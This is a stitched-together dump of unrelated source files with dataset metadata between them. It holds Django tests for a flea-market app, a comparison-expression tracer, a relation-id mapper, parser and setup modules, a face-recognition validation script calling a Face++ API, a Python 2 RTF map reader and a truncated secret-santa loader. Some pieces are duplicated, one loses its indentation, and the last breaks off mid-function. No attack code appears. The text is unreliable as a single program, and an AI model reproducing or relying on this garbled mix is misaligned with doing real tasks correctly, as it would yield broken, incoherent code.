        # Set up an activated seller and buyer who both accepted the rules.
        seller = create_user('test1', '<EMAIL>', 'hokuma1')
        wanting_user = create_user('test2', '<EMAIL>', 'hokuma2')
        seller = activate_user(seller)
        wanting_user = activate_user(wanting_user)
        seller = comfirm_site_rules(seller)
        wanting_user = comfirm_site_rules(wanting_user)
        product = create_product(seller, 'テスト商品', 'テスト商品です', 100)
        chat = create_chat(product, wanting_user, seller)
        # Two messages, posted two days and one day in the past.
        add_talk_to_chat(talker=wanting_user, chat=chat, sentence='購入希望送らせていただきました', days=-2)
        add_talk_to_chat(talker=seller, chat=chat, sentence='購入希望ありがとうございます!', days=-1)
        client = Client()
        client.force_login(seller, backend='django.contrib.auth.backends.ModelBackend')
        response = client.get(reverse('product:product_direct_chat',
                                      kwargs={'product_pk': product.pk, 'wanting_user_pk': wanting_user.pk}))
        # Both talks must be present in the template context.
        self.assertQuerysetEqual(
            response.context['talks'],
            ['<Talk: Talk object (1)>', '<Talk: Talk object (2)>']
        )
class ProductDetailsViewTests(TestCase):
    """Tests for the product details view."""

    def test_product_details(self):
        """The details view exposes the requested product to the template."""
        seller = create_user('test1', '<EMAIL>', 'hokuma1')
        seller = activate_user(seller)
        seller = comfirm_site_rules(seller)
        product = create_product(seller, 'テスト商品', 'テスト商品です', 100)
        client = Client()
        # Unlike the chat view, no login is performed here.
        response = client.get(reverse('product:product_details',
                                      kwargs={'pk': product.pk}))
        self.assertEqual(
            response.context['product'],
            product
        )
| from django.test import TestCase, Client
from django.urls import reverse
from django.utils import timezone
import datetime
from hokudai_furima.account.models import User
from hokudai_furima.product.models import Product
from hokudai_furima.chat.models import Chat, Talk
def create_user(username, email, password):
    """Create and return an active User with the given credentials."""
    user = User.objects.create_user(username=username, email=email, password=password, is_active=True)
    return user
def comfirm_site_rules(user):
    """Mark the user as having accepted the site rules and return it.

    NOTE(review): the name is a typo of "confirm"; renaming would require
    updating every caller, so it is only flagged here.
    """
    user.is_rules_confirmed = True
    user.save()
    return user
def activate_user(user):
    """Set the user active, persist the change and return the user."""
    user.is_active = True
    user.save()
    return user
def create_product(user, title, description, price):
    """Create and return a Product sold by the given user."""
    product = Product.objects.create(seller=user, title=title, description=description, price=price)
    return product
def create_chat(product, product_wanting_user, product_seller):
    """Create and return a Chat about the product between a prospective
    buyer and the seller, timestamped now."""
    chat = Chat.objects.create(product=product,
                               product_wanting_user=product_wanting_user,
                               product_seller=product_seller,
                               created_date=timezone.now())
    return chat
def add_talk_to_chat(talker, chat, sentence, days):
    """Append a Talk to the chat, timestamped `days` days from now; negative
    values create messages in the past."""
    time = timezone.now() + datetime.timedelta(days=days)
    talk = Talk.objects.create(talker=talker, chat=chat, sentence=sentence, created_date=time)
    chat.talk_set.add(talk)
class ProductDirectChatViewTests(TestCase):
    """Tests for the product direct-chat view."""

    def test_two_past_questions(self):
        """
        The direct-chat view exposes every talk of the chat between the
        seller and the interested user to the template.
        """
        # Set up an activated seller and buyer who both accepted the rules.
        seller = create_user('test1', '<EMAIL>', 'hokuma1')
        wanting_user = create_user('test2', '<EMAIL>', 'hokuma2')
        seller = activate_user(seller)
        wanting_user = activate_user(wanting_user)
        seller = comfirm_site_rules(seller)
        wanting_user = comfirm_site_rules(wanting_user)
        product = create_product(seller, 'テスト商品', 'テスト商品です', 100)
        chat = create_chat(product, wanting_user, seller)
        # Two messages, posted two days and one day in the past.
        add_talk_to_chat(talker=wanting_user, chat=chat, sentence='購入希望送らせていただきました', days=-2)
        add_talk_to_chat(talker=seller, chat=chat, sentence='購入希望ありがとうございます!', days=-1)
        client = Client()
        client.force_login(seller, backend='django.contrib.auth.backends.ModelBackend')
        response = client.get(reverse('product:product_direct_chat',
                                      kwargs={'product_pk': product.pk, 'wanting_user_pk': wanting_user.pk}))
        # Both talks must be present in the template context.
        self.assertQuerysetEqual(
            response.context['talks'],
            ['<Talk: Talk object (1)>', '<Talk: Talk object (2)>']
        )
class ProductDetailsViewTests(TestCase):
def test_product_details(self):
seller = create_user('test1', '<EMAIL>', 'hokuma1')
seller = activate_user(seller)
seller = comfirm_site_rules(seller)
product = create_product(seller, 'テスト商品', 'テスト商品です', 100)
client = Client()
response = client.get(reverse('product:product_details',
kwargs={'pk': product.pk}))
self.assertEqual(
response.context['product'],
product
)
| en | 0.61382 | The questions index page may display multiple questions. | 2.314805 | 2 |
gerryopt/trace/_cmp_op.py | pjrule/gerryopt | 0 | 6617406 | <gh_stars>0
"""Tracing for comparison expressions."""
from itertools import product
from typing import Union
from gerryopt.trace._expr import TracedExpr
from gerryopt.trace._constant import Constant, coerce_constants
from gerryopt.trace.opcodes import (CmpOpcode, CMP_OPCODE_TO_REPR,
CMP_OPCODE_TO_METHOD_NAME)
from gerryopt.trace.types import (is_scalar, is_ndarray, is_possibly_ndarray,
scalar_type, size_intersection, type_union,
type_product, make_ndarray, binary_broadcast,
Scalar)
Val = Union[TracedExpr, Scalar]
class CmpOp(TracedExpr):
"""A binary operation expression."""
left: TracedExpr
right: TracedExpr
op: CmpOpcode
def __init__(self, left: Val, right: Val, op: CmpOpcode):
self.left, self.right = coerce_constants(left, right)
self.op = op
self.dtype = None
for (lhs, rhs) in type_product(self.left.dtype, self.right.dtype):
self.dtype = type_union(self.dtype,
binary_broadcast(bool, lhs, rhs))
def __repr__(self):
opcode_repr = CMP_OPCODE_TO_REPR[self.op]
return f'CmpOp({opcode_repr}, {self.left}, {self.right})'
# Dynamically inject comparison tracing into generic expressions.
for op, name in CMP_OPCODE_TO_METHOD_NAME.items():
setattr(TracedExpr,
f'__{name}__',
lambda self, other, _op=op: CmpOp(self, other, _op))
| """Tracing for comparison expressions."""
from itertools import product
from typing import Union
from gerryopt.trace._expr import TracedExpr
from gerryopt.trace._constant import Constant, coerce_constants
from gerryopt.trace.opcodes import (CmpOpcode, CMP_OPCODE_TO_REPR,
CMP_OPCODE_TO_METHOD_NAME)
from gerryopt.trace.types import (is_scalar, is_ndarray, is_possibly_ndarray,
scalar_type, size_intersection, type_union,
type_product, make_ndarray, binary_broadcast,
Scalar)
Val = Union[TracedExpr, Scalar]
class CmpOp(TracedExpr):
"""A binary operation expression."""
left: TracedExpr
right: TracedExpr
op: CmpOpcode
def __init__(self, left: Val, right: Val, op: CmpOpcode):
self.left, self.right = coerce_constants(left, right)
self.op = op
self.dtype = None
for (lhs, rhs) in type_product(self.left.dtype, self.right.dtype):
self.dtype = type_union(self.dtype,
binary_broadcast(bool, lhs, rhs))
def __repr__(self):
opcode_repr = CMP_OPCODE_TO_REPR[self.op]
return f'CmpOp({opcode_repr}, {self.left}, {self.right})'
# Dynamically inject comparison tracing into generic expressions.
for op, name in CMP_OPCODE_TO_METHOD_NAME.items():
setattr(TracedExpr,
f'__{name}__',
lambda self, other, _op=op: CmpOp(self, other, _op)) | en | 0.803874 | Tracing for comparison expressions. A binary operation expression. # Dynamically inject comparison tracing into generic expressions. | 2.524147 | 3 |
seq2seq/preprocess/get_relation2id_dict.py | JiexingQi/picard | 2 | 6617407 |
def get_relation2id_dict(choice = "Default", use_coref = False, use_dependency = False):
from .constants import RELATIONS, MAX_RELATIVE_DIST
current_relation = [r for r in RELATIONS]
if not use_coref:
current_relation = [r for r in current_relation if r not in ['co_relations', 'coref_relations']]
if not use_dependency:
current_relation = [r for r in current_relation if r not in ['Forward-Syntax', 'Backward-Syntax', 'None-Syntax']]
if choice in ["Default"]:
idx_list = [i for i in range(1, len(current_relation)+1)]
elif choice == "DefaultWithoutSchemaEncoding":
schema_encoding_rel = []
for rel in current_relation:
split_rel = rel.split("-")
try:
src_type, tgt_type = split_rel[0], split_rel[1]
except:
continue
if src_type in ["table", "column", "*"] and tgt_type in ["table", "column", "*"]:
schema_encoding_rel.append(rel)
current_relation = [r for r in current_relation if r not in schema_encoding_rel]
idx_list = [i for i in range(1, len(current_relation)+1)]
for rel in schema_encoding_rel:
current_relation.append(rel)
idx_list.append(0)
elif choice == "DefaultWithoutSchemaLinking":
schema_linking_rel = []
for rel in current_relation:
split_rel = rel.split("-")
try:
src_type, tgt_type = split_rel[0], split_rel[1]
except:
continue
if (src_type in ["question"] and tgt_type in ["table", "column", "*"]) or (tgt_type in ["question"] and src_type in ["table", "column", "*"]):
schema_linking_rel.append(rel)
current_relation = [r for r in current_relation if r not in schema_linking_rel]
idx_list = [i for i in range(1, len(current_relation)+1)]
for rel in schema_linking_rel:
current_relation.append(rel)
idx_list.append(0)
elif choice == "MinType":
idx_list = []
dummy_idx = 8
for rel in current_relation:
if rel in ['question-column-partialmatch', 'question-table-partialmatch']:
idx_list.append(1)
elif rel in ['question-column-exactmatch', 'question-table-exactmatch']:
idx_list.append(2)
elif rel in ['question-column-valuematch']:
idx_list.append(3)
elif rel in ['question-table-nomatch', 'question-column-nomatch']:
idx_list.append(4)
elif rel in ['table-column-pk']:
idx_list.append(5)
elif rel in ['table-column-has']:
idx_list.append(6)
elif rel in ['column-column-fk']:
idx_list.append(7)
elif rel in ['question-question-generic'] + ['question-question-dist' + str(i) if i != 0 else 'question-question-identity' for i in range(- MAX_RELATIVE_DIST, MAX_RELATIVE_DIST + 1)]:
idx_list.append(dummy_idx)
dummy_idx += 1
else:
idx_list.append(0)
elif choice == "Dependency_MinType":
idx_list = []
dummy_idx = 8
for rel in current_relation:
if rel in ['question-column-partialmatch', 'question-table-partialmatch']:
idx_list.append(1)
elif rel in ['question-column-exactmatch', 'question-table-exactmatch']:
idx_list.append(2)
elif rel in ['question-column-valuematch']:
idx_list.append(3)
elif rel in ['question-table-nomatch', 'question-column-nomatch']:
idx_list.append(4)
elif rel in ['table-column-pk']:
idx_list.append(5)
elif rel in ['table-column-has']:
idx_list.append(6)
elif rel in ['column-column-fk']:
idx_list.append(7)
elif rel in ['Forward-Syntax', 'Backward-Syntax', 'None-Syntax']:
idx_list.append(dummy_idx)
dummy_idx += 1
else:
idx_list.append(0)
else:
raise NotImplementedError
RELATION2ID_DICT = dict(zip(current_relation, idx_list))
idx_list.append(0)
current_relation.append("None")
ID2RELATION_DICT = dict(zip(idx_list, current_relation))
return RELATION2ID_DICT, ID2RELATION_DICT, max(idx_list) |
def get_relation2id_dict(choice = "Default", use_coref = False, use_dependency = False):
from .constants import RELATIONS, MAX_RELATIVE_DIST
current_relation = [r for r in RELATIONS]
if not use_coref:
current_relation = [r for r in current_relation if r not in ['co_relations', 'coref_relations']]
if not use_dependency:
current_relation = [r for r in current_relation if r not in ['Forward-Syntax', 'Backward-Syntax', 'None-Syntax']]
if choice in ["Default"]:
idx_list = [i for i in range(1, len(current_relation)+1)]
elif choice == "DefaultWithoutSchemaEncoding":
schema_encoding_rel = []
for rel in current_relation:
split_rel = rel.split("-")
try:
src_type, tgt_type = split_rel[0], split_rel[1]
except:
continue
if src_type in ["table", "column", "*"] and tgt_type in ["table", "column", "*"]:
schema_encoding_rel.append(rel)
current_relation = [r for r in current_relation if r not in schema_encoding_rel]
idx_list = [i for i in range(1, len(current_relation)+1)]
for rel in schema_encoding_rel:
current_relation.append(rel)
idx_list.append(0)
elif choice == "DefaultWithoutSchemaLinking":
schema_linking_rel = []
for rel in current_relation:
split_rel = rel.split("-")
try:
src_type, tgt_type = split_rel[0], split_rel[1]
except:
continue
if (src_type in ["question"] and tgt_type in ["table", "column", "*"]) or (tgt_type in ["question"] and src_type in ["table", "column", "*"]):
schema_linking_rel.append(rel)
current_relation = [r for r in current_relation if r not in schema_linking_rel]
idx_list = [i for i in range(1, len(current_relation)+1)]
for rel in schema_linking_rel:
current_relation.append(rel)
idx_list.append(0)
elif choice == "MinType":
idx_list = []
dummy_idx = 8
for rel in current_relation:
if rel in ['question-column-partialmatch', 'question-table-partialmatch']:
idx_list.append(1)
elif rel in ['question-column-exactmatch', 'question-table-exactmatch']:
idx_list.append(2)
elif rel in ['question-column-valuematch']:
idx_list.append(3)
elif rel in ['question-table-nomatch', 'question-column-nomatch']:
idx_list.append(4)
elif rel in ['table-column-pk']:
idx_list.append(5)
elif rel in ['table-column-has']:
idx_list.append(6)
elif rel in ['column-column-fk']:
idx_list.append(7)
elif rel in ['question-question-generic'] + ['question-question-dist' + str(i) if i != 0 else 'question-question-identity' for i in range(- MAX_RELATIVE_DIST, MAX_RELATIVE_DIST + 1)]:
idx_list.append(dummy_idx)
dummy_idx += 1
else:
idx_list.append(0)
elif choice == "Dependency_MinType":
idx_list = []
dummy_idx = 8
for rel in current_relation:
if rel in ['question-column-partialmatch', 'question-table-partialmatch']:
idx_list.append(1)
elif rel in ['question-column-exactmatch', 'question-table-exactmatch']:
idx_list.append(2)
elif rel in ['question-column-valuematch']:
idx_list.append(3)
elif rel in ['question-table-nomatch', 'question-column-nomatch']:
idx_list.append(4)
elif rel in ['table-column-pk']:
idx_list.append(5)
elif rel in ['table-column-has']:
idx_list.append(6)
elif rel in ['column-column-fk']:
idx_list.append(7)
elif rel in ['Forward-Syntax', 'Backward-Syntax', 'None-Syntax']:
idx_list.append(dummy_idx)
dummy_idx += 1
else:
idx_list.append(0)
else:
raise NotImplementedError
RELATION2ID_DICT = dict(zip(current_relation, idx_list))
idx_list.append(0)
current_relation.append("None")
ID2RELATION_DICT = dict(zip(idx_list, current_relation))
return RELATION2ID_DICT, ID2RELATION_DICT, max(idx_list) | none | 1 | 2.682308 | 3 | |
tests/inspectortodo/validator/__init__.py | code-acrobat/InspectorTodo | 8 | 6617408 | <reponame>code-acrobat/InspectorTodo
# Copyright 2018 TNG Technology Consulting GmbH, Unterföhring, Germany
# Licensed under the Apache License, Version 2.0 - see LICENSE.md in project root directory
| # Copyright 2018 TNG Technology Consulting GmbH, Unterföhring, Germany
# Licensed under the Apache License, Version 2.0 - see LICENSE.md in project root directory | en | 0.643204 | # Copyright 2018 TNG Technology Consulting GmbH, Unterföhring, Germany # Licensed under the Apache License, Version 2.0 - see LICENSE.md in project root directory | 0.83033 | 1 |
wtl/wtparser/parsers/base.py | elegion/djangodash2013 | 0 | 6617409 | <reponame>elegion/djangodash2013
from __future__ import unicode_literals
import re
class BaseParser(object):
language = 'unknown'
filename = 'unknown'
def detect(self, content):
return False
def _detect_by_regex(self, content, pats):
return any(re.compile(p, re.MULTILINE).search(content) for p in pats)
def get_platform(self, lines):
return None
def get_version(self, lines):
return None
def get_packages(self, lines):
return None
def parse(self, content):
lines = content.splitlines()
return {
'filename': self.filename,
'language': self.language,
'platform': self.get_platform(lines),
'version': self.get_version(lines),
'packages': self.get_packages(lines),
}
| from __future__ import unicode_literals
import re
class BaseParser(object):
language = 'unknown'
filename = 'unknown'
def detect(self, content):
return False
def _detect_by_regex(self, content, pats):
return any(re.compile(p, re.MULTILINE).search(content) for p in pats)
def get_platform(self, lines):
return None
def get_version(self, lines):
return None
def get_packages(self, lines):
return None
def parse(self, content):
lines = content.splitlines()
return {
'filename': self.filename,
'language': self.language,
'platform': self.get_platform(lines),
'version': self.get_version(lines),
'packages': self.get_packages(lines),
} | none | 1 | 2.66283 | 3 | |
setup.py | joezuntz/DESC_BPZ | 0 | 6617410 | <gh_stars>0
from setuptools import setup, find_namespace_packages
packages = find_namespace_packages()
setup(
name="desc_bpz",
version="0.0.1",
author="<NAME>, <NAME>, <NAME>,"
"<NAME>, LSST DESC PZWG",
author_email="<EMAIL>",
packages=packages,
package_data={
"": ["*.h5", "*.yaml", "*.sed", "*.res",
"*.AB", "*.columns", "*.pars"],
"tests": ["*.h5", "*.yaml"],
"SED": ["*.sed"],
"FILTER": ["*.res"],
"AB": ["*.AB"],
"scripts": ["*.columns, *.pars"]
},
include_package_data=True,
license="BSD 3-Clause License",
description="Python3 version of BPZ used in DESC",
url="https://github.com/LSSTDESC/DESC_BPZ",
long_description=open("README.md").read(),
classifiers=[
"Development Status :: 4 - Beta",
"License :: OSI Approved :: BSD 3-Clause",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"Operating System :: OS Independent",
"Programming Language :: Python"
],
install_requires=['numpy',
'scipy',
'pandas>=1.1',
'h5py',
],
python_requires='>=3.5',
setup_requires=['pytest-runner'],
tests_require=['pytest'],
)
| from setuptools import setup, find_namespace_packages
packages = find_namespace_packages()
setup(
name="desc_bpz",
version="0.0.1",
author="<NAME>, <NAME>, <NAME>,"
"<NAME>, LSST DESC PZWG",
author_email="<EMAIL>",
packages=packages,
package_data={
"": ["*.h5", "*.yaml", "*.sed", "*.res",
"*.AB", "*.columns", "*.pars"],
"tests": ["*.h5", "*.yaml"],
"SED": ["*.sed"],
"FILTER": ["*.res"],
"AB": ["*.AB"],
"scripts": ["*.columns, *.pars"]
},
include_package_data=True,
license="BSD 3-Clause License",
description="Python3 version of BPZ used in DESC",
url="https://github.com/LSSTDESC/DESC_BPZ",
long_description=open("README.md").read(),
classifiers=[
"Development Status :: 4 - Beta",
"License :: OSI Approved :: BSD 3-Clause",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"Operating System :: OS Independent",
"Programming Language :: Python"
],
install_requires=['numpy',
'scipy',
'pandas>=1.1',
'h5py',
],
python_requires='>=3.5',
setup_requires=['pytest-runner'],
tests_require=['pytest'],
) | none | 1 | 1.502804 | 2 | |
setup.py | philastrophist/pygmmis | 0 | 6617411 | from setuptools import setup
setup(
name="pygmmis",
description="Gaussian mixture model for incomplete, truncated, and noisy data",
long_description="Gaussian mixture model for incomplete, truncated, and noisy data",
version='1.1.0',
author="<NAME>",
author_email="<EMAIL>",
license='MIT',
py_modules=["pygmmis"],
url="https://github.com/pmelchior/pygmmis",
classifiers=[
"Development Status :: 5 - Production/Stable",
"License :: OSI Approved :: MIT License",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Topic :: Scientific/Engineering :: Information Analysis"
],
requires=["numpy","scipy","multiprocessing","parmap"]
)
| from setuptools import setup
setup(
name="pygmmis",
description="Gaussian mixture model for incomplete, truncated, and noisy data",
long_description="Gaussian mixture model for incomplete, truncated, and noisy data",
version='1.1.0',
author="<NAME>",
author_email="<EMAIL>",
license='MIT',
py_modules=["pygmmis"],
url="https://github.com/pmelchior/pygmmis",
classifiers=[
"Development Status :: 5 - Production/Stable",
"License :: OSI Approved :: MIT License",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Topic :: Scientific/Engineering :: Information Analysis"
],
requires=["numpy","scipy","multiprocessing","parmap"]
)
| none | 1 | 0.981673 | 1 | |
src/spaceone/inventory/model/load_balancer.py | choonho/plugin-google-cloud-compute-inven-collector | 3 | 6617412 | from schematics import Model
from schematics.types import StringType, IntType, DictType, ListType
class LoadBalancer(Model):
type = StringType(choices=('HTTP', 'TCP', 'UDP'))
name = StringType()
dns = StringType(default="")
port = ListType(IntType())
protocol = ListType(StringType())
scheme = StringType(choices=('EXTERNAL', 'INTERNAL'))
tags = DictType(StringType, default={})
| from schematics import Model
from schematics.types import StringType, IntType, DictType, ListType
class LoadBalancer(Model):
type = StringType(choices=('HTTP', 'TCP', 'UDP'))
name = StringType()
dns = StringType(default="")
port = ListType(IntType())
protocol = ListType(StringType())
scheme = StringType(choices=('EXTERNAL', 'INTERNAL'))
tags = DictType(StringType, default={})
| none | 1 | 2.585566 | 3 | |
validateResult.py | mundanePeo/faceRecognition | 14 | 6617413 | <reponame>mundanePeo/faceRecognition<gh_stars>10-100
from requests_toolbelt import MultipartEncoder
from datetime import date, timedelta
from tqdm import tqdm
from config.configLoad import config_data
import requests
import base64
import os
import json
import argparse
BASE_DIR = 'static/people'
people_list = os.listdir(BASE_DIR)
url = 'https://api-cn.faceplusplus.com/facepp/v3/compare'
getDay = None
def getSomeday(day=1):
today = date.today()
oneday = timedelta(days=day)
someday = today-oneday
return someday
def prepare():
global getDay
parser = argparse.ArgumentParser()
parser.add_argument("-d", "--date", type=int, default=1, help="验证指定日期的识别结果,1代表以今天为基准向前一天也即昨天")
args = parser.parse_args()
d = args.date
getDay = getSomeday(d)
test_pair = os.path.join('static', f'{getDay}_resultRecord.txt')
return test_pair
def getData(file_path):
if not os.path.exists(file_path) or not (isinstance(file_path, str) and file_path.endswith('.txt')):
raise FileExistsError
with open(file_path, 'r') as f:
test_data = f.readlines()
return test_data
def validation(test_data: list):
if len(people_list) == 0:
raise FileNotFoundError
count = 0.
far = 0.
frr = 0.
sum = len(test_data)
runningLog = []
runningLog.append(str(getDay))
runningLog.append("\n")
print("————————————————————validation start!————————————————————")
for i in tqdm(range(len(test_data))):
file1, _ = test_data[i].split(' ')
# print("now : ", file1)
runningLog.append(file1)
runningLog.append("\t")
_ = _.strip('\n')
respeo = 0
end = 0.
with open(file1, 'rb') as f:
img1 = base64.b64encode(f.read()).decode()
for j in range(len(people_list)):
peo = people_list[j]
peo_dir = os.path.join(BASE_DIR, peo)
img_list = os.listdir(peo_dir)
index = 0
while True:
file2 = os.path.join(peo_dir, img_list[index])
# print("validate image ", file2)
with open(file2, 'rb') as f:
img2 = base64.b64encode(f.read()).decode()
params = MultipartEncoder(fields={'api_key': config_data['validate']['api_key'],
'api_secret': config_data['validate']['api_secret'],
'image_base64_1': img1,
'image_base64_2': img2
},)
r = requests.post(url, data=params, headers={'Content-Type': params.content_type})
result = r.content
result = result.decode()
result = dict(json.loads(result))
# print(result)
if 'error_message' not in result.keys():
if 'confidence' not in result.keys() or 'thresholds' not in result.keys():
break
confidence = result['confidence']
thresh = result['thresholds']
if confidence <= thresh['1e-3']:
output = 0
elif confidence >= thresh['1e-5']:
output = 1
else:
output = 1
if output == 1:
respeo = int(peo)
break
index += 1
else:
if str(result['error_message']) not in runningLog:
runningLog.append(str(result['error_message']))
runningLog.append("\t")
break
index += 1
if index == 3:
end = j
break
if respeo != 0:
break
elif end == len(people_list)-1 and index == 3:
respeo = -3
elif end < len(people_list)-1 and index < 3:
respeo = -2
break
# print("final id is ", respeo)
# print("initial id is ", _)
runningLog.append(f"final:{respeo}\t")
runningLog.append(f"initial:{_}\n")
with open('runningLog.txt', 'a+') as f:
f.writelines(runningLog)
runningLog.clear()
if respeo == int(_):
count += 1
elif respeo == -3 or ((10000001<=respeo<=10000009) and respeo != int(_)):
far += 1
else:
sum -= 1
with open('validateResult.txt', 'a+') as f:
line = [str(getDay), '\t', f'precision: {count/sum}\t', f'far: {far}\t', f'frrProb: {far/sum}\n']
f.writelines(line)
print("————————————————————validation end!————————————————————")
if __name__ == "__main__":
try:
file_name = prepare()
test_data = getData(file_name)
validation(test_data)
except FileExistsError as e:
print("The record of your input day is not exist!")
except FileNotFoundError as e:
print("Don't find images in static/people")
| from requests_toolbelt import MultipartEncoder
from datetime import date, timedelta
from tqdm import tqdm
from config.configLoad import config_data
import requests
import base64
import os
import json
import argparse
BASE_DIR = 'static/people'
people_list = os.listdir(BASE_DIR)
url = 'https://api-cn.faceplusplus.com/facepp/v3/compare'
getDay = None
def getSomeday(day=1):
today = date.today()
oneday = timedelta(days=day)
someday = today-oneday
return someday
def prepare():
global getDay
parser = argparse.ArgumentParser()
parser.add_argument("-d", "--date", type=int, default=1, help="验证指定日期的识别结果,1代表以今天为基准向前一天也即昨天")
args = parser.parse_args()
d = args.date
getDay = getSomeday(d)
test_pair = os.path.join('static', f'{getDay}_resultRecord.txt')
return test_pair
def getData(file_path):
if not os.path.exists(file_path) or not (isinstance(file_path, str) and file_path.endswith('.txt')):
raise FileExistsError
with open(file_path, 'r') as f:
test_data = f.readlines()
return test_data
def validation(test_data: list):
if len(people_list) == 0:
raise FileNotFoundError
count = 0.
far = 0.
frr = 0.
sum = len(test_data)
runningLog = []
runningLog.append(str(getDay))
runningLog.append("\n")
print("————————————————————validation start!————————————————————")
for i in tqdm(range(len(test_data))):
file1, _ = test_data[i].split(' ')
# print("now : ", file1)
runningLog.append(file1)
runningLog.append("\t")
_ = _.strip('\n')
respeo = 0
end = 0.
with open(file1, 'rb') as f:
img1 = base64.b64encode(f.read()).decode()
for j in range(len(people_list)):
peo = people_list[j]
peo_dir = os.path.join(BASE_DIR, peo)
img_list = os.listdir(peo_dir)
index = 0
while True:
file2 = os.path.join(peo_dir, img_list[index])
# print("validate image ", file2)
with open(file2, 'rb') as f:
img2 = base64.b64encode(f.read()).decode()
params = MultipartEncoder(fields={'api_key': config_data['validate']['api_key'],
'api_secret': config_data['validate']['api_secret'],
'image_base64_1': img1,
'image_base64_2': img2
},)
r = requests.post(url, data=params, headers={'Content-Type': params.content_type})
result = r.content
result = result.decode()
result = dict(json.loads(result))
# print(result)
if 'error_message' not in result.keys():
if 'confidence' not in result.keys() or 'thresholds' not in result.keys():
break
confidence = result['confidence']
thresh = result['thresholds']
if confidence <= thresh['1e-3']:
output = 0
elif confidence >= thresh['1e-5']:
output = 1
else:
output = 1
if output == 1:
respeo = int(peo)
break
index += 1
else:
if str(result['error_message']) not in runningLog:
runningLog.append(str(result['error_message']))
runningLog.append("\t")
break
index += 1
if index == 3:
end = j
break
if respeo != 0:
break
elif end == len(people_list)-1 and index == 3:
respeo = -3
elif end < len(people_list)-1 and index < 3:
respeo = -2
break
# print("final id is ", respeo)
# print("initial id is ", _)
runningLog.append(f"final:{respeo}\t")
runningLog.append(f"initial:{_}\n")
with open('runningLog.txt', 'a+') as f:
f.writelines(runningLog)
runningLog.clear()
if respeo == int(_):
count += 1
elif respeo == -3 or ((10000001<=respeo<=10000009) and respeo != int(_)):
far += 1
else:
sum -= 1
with open('validateResult.txt', 'a+') as f:
line = [str(getDay), '\t', f'precision: {count/sum}\t', f'far: {far}\t', f'frrProb: {far/sum}\n']
f.writelines(line)
print("————————————————————validation end!————————————————————")
if __name__ == "__main__":
try:
file_name = prepare()
test_data = getData(file_name)
validation(test_data)
except FileExistsError as e:
print("The record of your input day is not exist!")
except FileNotFoundError as e:
print("Don't find images in static/people") | en | 0.632409 | # print("now : ", file1) # print("validate image ", file2) # print(result) # print("final id is ", respeo) # print("initial id is ", _) | 2.506389 | 3 |
WorkingDirectory/DaisyPipeline/transformers/ca_cnib_rtf2dtbook/rtf2xml-py/rtf2xml/get_char_map.py | sensusaps/RoboBraille.Web.API | 7 | 6617414 | #########################################################################
# #
# #
# copyright 2002 <NAME> #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU #
# General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with this program; if not, write to the Free Software #
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA #
# 02111-1307 USA #
# #
# #
#########################################################################
import sys, os, rtf2xml.copy, string
class GetCharMap:
"""
Return the character map for the given value
"""
def __init__(self, bug_handler, char_file):
"""
Required:
'char_file'--the file with the mappings
Returns:
nothing
"""
self.__char_file = char_file
def get_char_map(self, map):
found_map = 0
map_dict = {}
read_obj = open(self.__char_file, 'r')
line = 1
while line:
line = read_obj.readline()
begin_element = '<%s>' % map;
end_element = '</%s>' % map
if not found_map:
if string.find(line, begin_element) >= 0:
found_map = 1
else:
if string.find(line, end_element) >= 0:
break
else:
line = line[:-1]
fields = line.split(':')
fields[1].replace('\\colon', ':')
map_dict[fields[1]] = fields[3]
read_obj.close()
if not found_map:
msg = 'no map found\n'
msg += 'map is "%s"\n'
raise self.__bug_handler, msg
return map_dict
| #########################################################################
# #
# #
# copyright 2002 <NAME> #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU #
# General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with this program; if not, write to the Free Software #
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA #
# 02111-1307 USA #
# #
# #
#########################################################################
import sys, os, rtf2xml.copy, string
class GetCharMap:
"""
Return the character map for the given value
"""
def __init__(self, bug_handler, char_file):
"""
Required:
'char_file'--the file with the mappings
Returns:
nothing
"""
self.__char_file = char_file
def get_char_map(self, map):
found_map = 0
map_dict = {}
read_obj = open(self.__char_file, 'r')
line = 1
while line:
line = read_obj.readline()
begin_element = '<%s>' % map;
end_element = '</%s>' % map
if not found_map:
if string.find(line, begin_element) >= 0:
found_map = 1
else:
if string.find(line, end_element) >= 0:
break
else:
line = line[:-1]
fields = line.split(':')
fields[1].replace('\\colon', ':')
map_dict[fields[1]] = fields[3]
read_obj.close()
if not found_map:
msg = 'no map found\n'
msg += 'map is "%s"\n'
raise self.__bug_handler, msg
return map_dict
| en | 0.599726 | ######################################################################### # # # # # copyright 2002 <NAME> # # # # This program is distributed in the hope that it will be useful, # # but WITHOUT ANY WARRANTY; without even the implied warranty of # # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # # General Public License for more details. # # # # You should have received a copy of the GNU General Public License # # along with this program; if not, write to the Free Software # # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA # # 02111-1307 USA # # # # # ######################################################################### Return the character map for the given value Required: 'char_file'--the file with the mappings Returns: nothing | 2.922932 | 3 |
ss.py | tylerparsons/secretsanta | 1 | 6617415 | import sys
import random
import secretsanta as ss
import datetime as dt
# CSV column mappings
FAM_MEMBER_COL = 0
FAM_FAMILY_COL = 1
CONN_SOURCE_COL = 0
CONN_TARGET_COL = 1
CONN_YEAR_COL = 2
def loadFamilyMembers(csvPath):
'''
Returns families, a map of members to their
associated families, and members, a map of
families to a set of its members.
'''
with open(csvPath, 'r') as file:
families = {}
members = {}
for line in file:
data = line.strip().split(',')
member = data[FAM_MEMBER_COL]
family = data[FAM_FAMILY_COL]
families[member] = family
if family not in members:
members[family] = set()
members[family].add(member)
return families, members
def loadConnections(csvPath, families, members):
with open(csvPath, 'r') as file:
connections = ss.ConnectionGraph(families,
members)
for line in file:
data = line.strip().split(',')
